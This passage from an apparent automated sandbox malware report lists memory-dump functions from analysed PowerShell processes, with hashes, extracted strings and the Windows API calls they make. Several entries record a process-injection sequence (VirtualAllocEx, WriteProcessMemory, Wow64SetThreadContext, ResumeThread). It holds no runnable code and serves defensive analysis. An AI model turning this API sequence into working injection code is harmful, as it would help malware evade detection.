Opcode ID: c3f437531f9d00c9bbb27ec53b46dd8a5d4892f7b92edb68415e9130c2a5ee54
Instruction ID: e6409cdb41502aa08e81b63ab27cd85f9832a0fab7c8ca58dcd2958b6912b878
Opcode Fuzzy Hash: c3f437531f9d00c9bbb27ec53b46dd8a5d4892f7b92edb68415e9130c2a5ee54
Instruction Fuzzy Hash: 344127B5A00505DFCB09CF58C598AAAFBF1FF48314B258A99D815AB364C736FC51CBA0

Function 04894C18 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1711809489.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55787e19526b0aa91c3a2d5ff4e8c3c11d956a088f0b25aed9b10ccb5fe6f861
Instruction ID: 95d8859b76977c616ee1b1ab85d5a14327dc19edcb69dd910df3ac9516c543dc
Opcode Fuzzy Hash: 55787e19526b0aa91c3a2d5ff4e8c3c11d956a088f0b25aed9b10ccb5fe6f861
Instruction Fuzzy Hash: 601107B4A006099FCB04CF98D5909AEBBF1FF89314B148599E809EB361D331FD41CBA0

Function 0307D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1711533650.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_307d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6742b01f0a5d9afd87a7029c4cc70bd408eef45fed61ba4ffa7eee6386b98364
Instruction ID: 8426caafd7fd74616df62bf3465b45a02b12729bf1ca15560cababead2aa1642
Opcode Fuzzy Hash: 6742b01f0a5d9afd87a7029c4cc70bd408eef45fed61ba4ffa7eee6386b98364
Instruction Fuzzy Hash: 3B012D6140E3C09FD7128B258894B52BFB4EF53224F1D85DBD8888F1A3C2699845C7B2

Function 0307D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1711533650.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_307d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58549bc78be6927f552e756f99a902c855c63eb5c86c4d54acd68e40ab7619f
Instruction ID: 66bf6cc2c66ffa7ef732b80ca4ca936b71099d7bcdce55e24bceeff104343f31
Opcode Fuzzy Hash: e58549bc78be6927f552e756f99a902c855c63eb5c86c4d54acd68e40ab7619f
Instruction Fuzzy Hash: 0401A27180A3409EEB50CA29C984B6BFFD8EF41324F1CC96AED484A246C679D841CAF5

Non-executed Functions

Function 07831270 Relevance: 9.2, Strings: 7, Instructions: 484COMMON

Download Yara Rule

Strings

4'^q, xrefs: 078314D7
$^q, xrefs: 078312A8
$^q, xrefs: 07831282
tP^q, xrefs: 078312F9
$^q, xrefs: 078312B4
4'^q, xrefs: 078314E1
tP^q, xrefs: 078312ED

Memory Dump Source

Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: 192444af776caa5fb360c1ef5ff3749cd5f70c52fa689ce42f3cf4ed2e50b99a
Instruction ID: e3afcd758c3406d1be99559f1c335b6c518019d0d290549eaeb3f8b11909f35b
Opcode Fuzzy Hash: 192444af776caa5fb360c1ef5ff3749cd5f70c52fa689ce42f3cf4ed2e50b99a
Instruction Fuzzy Hash: A1F115B1F006098FDB149F6C98086AABBE6AFE5B11F18806AD405CB251EB35CD85C7E1

Function 078304E0 Relevance: 9.1, Strings: 7, Instructions: 315COMMON

Download Yara Rule

Strings

4'^q, xrefs: 078305EF
tP^q, xrefs: 07830739
$^q, xrefs: 078306E8
$^q, xrefs: 078306F4
tP^q, xrefs: 0783072D
$^q, xrefs: 078306C2
4'^q, xrefs: 078305E3

Memory Dump Source

Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: 1e70bc941c4a2a536ba64ec9bb41970ebda493f975881ee3e6f81fcd4b5582af
Instruction ID: 75be249f65e3d7f3b80952a0027da6698fd5f27791de5979bb739723e3a3fb66
Opcode Fuzzy Hash: 1e70bc941c4a2a536ba64ec9bb41970ebda493f975881ee3e6f81fcd4b5582af
Instruction Fuzzy Hash: 09A167B1B0431A8FC7248F7D980067ABBE6AFE5611F1884ABD445CB395DB32D845CBE1

Function 07833228 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07833290
$^q, xrefs: 0783323A
$^q, xrefs: 07833256
$^q, xrefs: 07833284

Memory Dump Source

Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 6d4f22bb316756cb72aeb49cab46eb04428752359a6bafc13547f4153d8f9930
Instruction ID: 524e9fca203a924dda8d9b9983a44e44cfa44eb3476a44e7ff054ebfd7929783
Opcode Fuzzy Hash: 6d4f22bb316756cb72aeb49cab46eb04428752359a6bafc13547f4153d8f9930
Instruction Fuzzy Hash: B62168B171430A5BDB28596E9C01F2BBBDAABE1B16F24C42AE505CF785CD36C84583E1

Function 0783030A Relevance: 5.1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0783037F
$^q, xrefs: 07830352
$^q, xrefs: 0783035E
4'^q, xrefs: 07830373

Memory Dump Source

Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 4a620752d292baf5f498b6c3221a9cf77fd31b43b85211bceaaeab563663ae29
Instruction ID: 6e2ae06e10023a69a971d3be33ac0b734adfb80f9665887803d93a020aba7138
Opcode Fuzzy Hash: 4a620752d292baf5f498b6c3221a9cf77fd31b43b85211bceaaeab563663ae29
Instruction Fuzzy Hash: 6101A265B0939A4FC72B162C28246956FF66FD3A10B1A45DBD041CF25BCD194C8E87E3

Analysis Process: powershell.exePID: 2504, Parent PID: 7068COMMON

Executed Functions

Function 00B6D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2334520231.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b6d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f27b66b3f7f2cd5eb5b3f701308276fe4737d675d171ef204536c3986c7b325
Instruction ID: 072a7c1d80ddb4122a102ff1ef75b7dfa0b6feb6508e2e3b85d1fd65ca160ec4
Opcode Fuzzy Hash: 4f27b66b3f7f2cd5eb5b3f701308276fe4737d675d171ef204536c3986c7b325
Instruction Fuzzy Hash: 65014C6250D3C09FD7124B258C94752BFB8EF53624F1984DBE9888F1A7C2695C49C772

Function 00B6D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2334520231.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b6d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 583c33bf3a131c4855546da40cc2187849445f772b863c8ea2bfcb8ca42822d3
Instruction ID: dc862ba0fc9a732807c6df055f1266fbca0baf1bc06add46e102ad3d446692e9
Opcode Fuzzy Hash: 583c33bf3a131c4855546da40cc2187849445f772b863c8ea2bfcb8ca42822d3
Instruction Fuzzy Hash: 76012631A083409AE7208A29CDC4B67BFD8EF81364F18C4AAED080B246C27DDC45C6B1

Function 00BE3026 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2335460626.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9496b7bd7d63d8a2e1eea92c6a384ae00c069dce7ea93ad6ff75ab4ec323753e
Instruction ID: 1f74898783b6c89ef8970728b17414c461e48d169369d39bceff01ec574ac715
Opcode Fuzzy Hash: 9496b7bd7d63d8a2e1eea92c6a384ae00c069dce7ea93ad6ff75ab4ec323753e
Instruction Fuzzy Hash: 5BF0D435A001099FCB15CF9DD994AEEF7B1FF88324F2081A9E515A72A1C736AD52CB60

Analysis Process: powershell.exePID: 5820, Parent PID: 2504COMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	68
Total number of Limit Nodes:	5

Executed Functions

Function 074B03E0 Relevance: 16.7, Strings: 13, Instructions: 411
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 074B0500
$^q, xrefs: 074B082F
$^q, xrefs: 074B0859
4'^q, xrefs: 074B051B
4'^q, xrefs: 074B06C3
4'^q, xrefs: 074B06B7
$^q, xrefs: 074B07F7
4'^q, xrefs: 074B0527
$^q, xrefs: 074B04F4
$^q, xrefs: 074B0813
$^q, xrefs: 074B049E
$^q, xrefs: 074B083B
$^q, xrefs: 074B084D

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2118039658
Opcode ID: ea0a4c93be3b3ff77a160efd659906fd94cdd9253a884cb435d631c148fecfd7
Instruction ID: 1cbc224c25e42f1f22117eb0f8b68c1c591003d185036dc919395afd3a332708
Opcode Fuzzy Hash: ea0a4c93be3b3ff77a160efd659906fd94cdd9253a884cb435d631c148fecfd7
Instruction Fuzzy Hash: 1CD115B1B0020A8FDB349E6994406EBBBE5EFC5612F14886BD405CB361EB31CD86C7B1

Function 074B1848 Relevance: 6.5, Strings: 5, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 074B1904
$^q, xrefs: 074B18F8
$^q, xrefs: 074B189F
4'^q, xrefs: 074B1962
4'^q, xrefs: 074B1956

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 6a6c6d908ba8a3cd7cac33f469ca4891b9c9b78bf49cb248d2bc0a7952733621
Instruction ID: c7260e883211a66bb21a7f72a60f035a0c0e29cdf169a46b8d6f299ab589e048
Opcode Fuzzy Hash: 6a6c6d908ba8a3cd7cac33f469ca4891b9c9b78bf49cb248d2bc0a7952733621
Instruction Fuzzy Hash: F47124B5B0034E9FCB354A7988606EB7BE6AF86610F14886BD804CB395DA31DD85C771

Function 04639A58 Relevance: 5.0, APIs: 3, Instructions: 510
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04639D12
VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04639DB4

Part of subcall function 046385C8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18672514,00000000,?,?,?,00000000,00000000,?,04639E17,?,00000000,?), ref: 0463A68C

ResumeThread.KERNELBASE(?), ref: 0463A037

Memory Dump Source

Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4630000_powershell.jbxd

Similarity

API ID: AllocVirtual$MemoryProcessResumeThreadWrite
String ID:
API String ID: 2390764575-0
Opcode ID: 8839a2c6c9df8f9480b40d96e09dcde835d996b5fccabb1d8ebefe9088b33c4a
Instruction ID: d1c1e1c64044e0379c5f441b980f68906e4a2acfe415b7c2811e81f8e5a9e9be
Opcode Fuzzy Hash: 8839a2c6c9df8f9480b40d96e09dcde835d996b5fccabb1d8ebefe9088b33c4a
Instruction Fuzzy Hash: F412B070B002588BDB649F74CC54B9EB7F2AF84345F1081A9D449AB391EF70AE85DF92

Function 046399EF Relevance: 4.9, APIs: 3, Instructions: 433
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7efad14ede6d5817a79d200de3727dca6a944226ba765530d752debe02171466
Instruction ID: 2dac86e441d7d7d60d2ff49b3a3a7dfc0bef53b0daf9e4d78af5caf6da0c865d
Opcode Fuzzy Hash: 7efad14ede6d5817a79d200de3727dca6a944226ba765530d752debe02171466
Instruction Fuzzy Hash: D202A170A002588FEB24CF64CC44B9AB7F6EF45345F1481A9E989A7391EB70EE85CF51

Function 074B03CB Relevance: 3.9, Strings: 3, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 074B04F4
4'^q, xrefs: 074B051B
$^q, xrefs: 074B049E

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: aff75ec66b520cd85e733bfa78d8e5f08c195e4f4e7f2de921456e60c744dac6
Instruction ID: ecd728fe10824c32791dedd5be17875b99693ffa3909c776f54f815855e8911e
Opcode Fuzzy Hash: aff75ec66b520cd85e733bfa78d8e5f08c195e4f4e7f2de921456e60c744dac6
Instruction Fuzzy Hash: AE31EDF0A003069FDB348E2485407EB7BA4AF82256F554867C8059B6B6DB35CE86C772

Function 074B0DB8 Relevance: 3.9, Strings: 3, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 074B0E3B
$^q, xrefs: 074B0E2F
$^q, xrefs: 074B0E0B

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 5f5c0ea46dfb8c9964e85551397d106f408e4429041c8f82a2c16d0450352aae
Instruction ID: a749bcd2c683685656493c79efbc43b26dfe3ffec365e1fc2506cadc3b485ec6
Opcode Fuzzy Hash: 5f5c0ea46dfb8c9964e85551397d106f408e4429041c8f82a2c16d0450352aae
Instruction Fuzzy Hash: 1631C3B1B0020E8FC7349AA9D4006EBB7E6ABC5612F14C46BC419DB350DB31DD56C7A1

Function 074B1828 Relevance: 3.8, Strings: 3, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 074B18F8
$^q, xrefs: 074B189F
4'^q, xrefs: 074B1956

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: 55cf1c67bc69d59ed1b672fcd6b760a3df18188e0d13dfbfbcf90ea11d9aaa10
Instruction ID: a419f11323fd6c824052a23f5023d1b5a337cca3e2a09c8194c219313eb92c64
Opcode Fuzzy Hash: 55cf1c67bc69d59ed1b672fcd6b760a3df18188e0d13dfbfbcf90ea11d9aaa10
Instruction Fuzzy Hash: 6331EDB5D0438EEFCB358E3584642EA7BE2BF42650F1988ABD8048B255D734CD45CB72

Function 04639D43 Relevance: 3.2, APIs: 2, Instructions: 197
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04639DB4
ResumeThread.KERNELBASE(?), ref: 0463A037

Memory Dump Source

Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4630000_powershell.jbxd

Similarity

API ID: AllocResumeThreadVirtual
String ID:
API String ID: 234695336-0
Opcode ID: 2a7e568b07463797ec0fc6c11dcbca9cb220350119bff49fdf34e6c688b2a5ba
Instruction ID: c0d8fc94343b32725729e71d00f332ed20c7ac225877fa0a1f4d14cfb2eea3e0
Opcode Fuzzy Hash: 2a7e568b07463797ec0fc6c11dcbca9cb220350119bff49fdf34e6c688b2a5ba
Instruction Fuzzy Hash: E2819270A002588BEB24CF74DC48B99B7B2FF4434AF14C1A8D89897391EB70AE84DF51

Function 074B2770 Relevance: 2.7, Strings: 2, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 074B2866
(o^q, xrefs: 074B2856

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q
API String ID: 0-1946778100
Opcode ID: 24457db727b5b0ddbc9c6de6efc8fabc89bb5a4e695367e5ba92b80c6dd5b5f9
Instruction ID: e21e9604e2cdee7fd419f3b6cb4692cfec6197b67b09fa0b314b98bf570d673d
Opcode Fuzzy Hash: 24457db727b5b0ddbc9c6de6efc8fabc89bb5a4e695367e5ba92b80c6dd5b5f9
Instruction Fuzzy Hash: 9C61F471B04309DFCB248E69C804BEB7BA6BB86310F14896BE5198B391CBB1CD95C771

Function 074B0F20 Relevance: 2.6, Strings: 2, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP^q, xrefs: 074B0FA6
tP^q, xrefs: 074B0FB2

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: a1c4e93f905315056269e802f62042fc8f7b744a12864bfebc5564a3778a6b27
Instruction ID: 39f5a4cfb22b4dcacfd327a61c6a2a4e9f9cc2e1405fc0f9cc1b576faba1df39
Opcode Fuzzy Hash: a1c4e93f905315056269e802f62042fc8f7b744a12864bfebc5564a3778a6b27
Instruction Fuzzy Hash: 5C412770B053886FC7215B688854BAABFE5AF86B00F14849BE444DF3D6CA71AC45C3B2

Function 074B24BF Relevance: 2.5, Strings: 2, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 074B24E2
4'^q, xrefs: 074B24EE

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 10aad8ea58ef0ef0d0aa0d2cfe4f70ffd9e1f1c7143cc88c7d34ace07be28eb3
Instruction ID: 8996aacedeaa9314afabdc8fb5b893f85aeb502bf7c1638afca048f2e9631201
Opcode Fuzzy Hash: 10aad8ea58ef0ef0d0aa0d2cfe4f70ffd9e1f1c7143cc88c7d34ace07be28eb3
Instruction Fuzzy Hash: F1E0D871B842894EDB2C6668A5642E97BA17FD3550F104CABC4408B259CB218C499372

Function 046385A4 Relevance: 1.7, APIs: 1, Instructions: 156
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,72AC10FC,?), ref: 0463A39C

Memory Dump Source

Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4630000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 13a3143838834531d3816ce968efe3422c7a239aa31ec487e0aa5c99506af41b
Instruction ID: 3a55afdbb843513a56c10bd6108a0bf88342124c9158507b3e49268888360a13
Opcode Fuzzy Hash: 13a3143838834531d3816ce968efe3422c7a239aa31ec487e0aa5c99506af41b
Instruction Fuzzy Hash: DD514871901259DFDB24CF99C944BDEBBB5FF48304F0480AAE909B7250EB75AA84DF90

Function 0463A257 Relevance: 1.7, APIs: 1, Instructions: 154
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,72AC10FC,?), ref: 0463A39C

Memory Dump Source

Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4630000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1248c745bd5c59f1358a85bde113ba4649dd0ff0511dfd15d05a65c82d7d628a
Instruction ID: 9237bb0c984a88d99847a1cef7aa3d843848a50a990935b818e989d656879300
Opcode Fuzzy Hash: 1248c745bd5c59f1358a85bde113ba4649dd0ff0511dfd15d05a65c82d7d628a
Instruction Fuzzy Hash: A9515871901259DFDB24CF99C940BDEBBB5BF48304F0480AAE909B7250EB35AA84CF90

Function 046385C8 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,18672514,00000000,?,?,?,00000000,00000000,?,04639E17,?,00000000,?), ref: 0463A68C

Memory Dump Source

Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4630000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b67997a72bb0d06e4511f87e6e8e1897e4bce605d4fb017408305bdd4e5bea4b
Instruction ID: 89dacfeefd325d9188e3881b582ce8c07b67639810b0cd33471791dfad9d8496
Opcode Fuzzy Hash: b67997a72bb0d06e4511f87e6e8e1897e4bce605d4fb017408305bdd4e5bea4b
Instruction Fuzzy Hash: 2D2107B1900359DFDB10CF9AC884BDEBBF8FB09320F10842AE558A7210D378A944DFA5

Function 0463A60F Relevance: 1.6, APIs: 1, Instructions: 61
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,18672514,00000000,?,?,?,00000000,00000000,?,04639E17,?,00000000,?), ref: 0463A68C

Memory Dump Source

Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4630000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4946a2aff4839645b2181f370e7021076293ff92f903e93ed4ca3821fbe04418
Instruction ID: dfa193ca2a0edb5bb2439acb62758ab308750f81a714e6012cfdcd081b85a9ac
Opcode Fuzzy Hash: 4946a2aff4839645b2181f370e7021076293ff92f903e93ed4ca3821fbe04418
Instruction Fuzzy Hash: A72118B5900359DFDB10CF9AC885BDEBBF8FB08320F10842AE558A7210D378A944CFA5

Function 046385D4 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04639BCB), ref: 0463A503

Memory Dump Source

Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4630000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6d473198c340d6b28391cae69d186e5dc85b4d27602ab1374a7eb0e232d14b7f
Instruction ID: 7a41339b3b62a5402b566874d1604ad9b5236de54d6dd1c23c56502c6945b38d
Opcode Fuzzy Hash: 6d473198c340d6b28391cae69d186e5dc85b4d27602ab1374a7eb0e232d14b7f
Instruction Fuzzy Hash: 0C1126B19003498FDB10CF9AC944BDEBBF4EB88320F14C42AE458A7601E778A545CFA5

Function 046385B0 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04639BCB), ref: 0463A503

Memory Dump Source

Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4630000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 127fcb286dcbf2bb4138abcf7ccd5757283661ee59fd312bba8c691043b44b6a
Instruction ID: 57008b0bd9be944f7130057e4891e9a9fd2ebaa9351d1f50badcbfdad9986b93
Opcode Fuzzy Hash: 127fcb286dcbf2bb4138abcf7ccd5757283661ee59fd312bba8c691043b44b6a
Instruction Fuzzy Hash: 9C1126B19003498FDB10CF9AC944BDEBBF4EB88320F14C42AE458A7601E778A945CFA5

Function 0463A497 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04639BCB), ref: 0463A503

Memory Dump Source

Source File: 00000009.00000002.1950922521.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Offset: 04630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4630000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a04248db32752f3b36e5f71e91050d2be28cd0d2c08dbc3c700889421df52875
Instruction ID: 4e476540cd73cfaab265d85de31f72a061c01b50ae2ed722559bcb3ea136436a
Opcode Fuzzy Hash: a04248db32752f3b36e5f71e91050d2be28cd0d2c08dbc3c700889421df52875
Instruction Fuzzy Hash: C51107B5D002498FDB10CF9AD845BDEFBF4EB88324F14842AD458A7640D778A545CFA5

Function 074B26EA Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

(o^q, xrefs: 074B2856

Memory Dump Source

Source File: 00000009.00000002.1995528124.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_74b0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 675bb27373b82ca05f1c16b641def69a8c65298e1a021d70a39783b55f24b4ff
Instruction ID: 73e6399ea7dd1e9ecfd8d4645d1e3e40e1a3466580bac2886227159db71cba30
Opcode Fuzzy Hash: 675bb27373b82ca05f1c16b641def69a8c65298e1a021d70a39783b55f24b4ff
Instruction Fuzzy Hash: 6931C4B0A0020ADFDB78CE19C844BEB7BA5BB45714F04866BE4188B2A0D7F0DD95CB75

Function 00CFD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1950333513.0000000000CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_cfd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a34a97da23b22c98b1ef2a4cbdd765f32edd64fd7ae5d95c469fbfee5c7a17
Instruction ID: bb3371fac222663078757924fce1d0ccaed6843489dc4649fdd0a534b28f2dc2
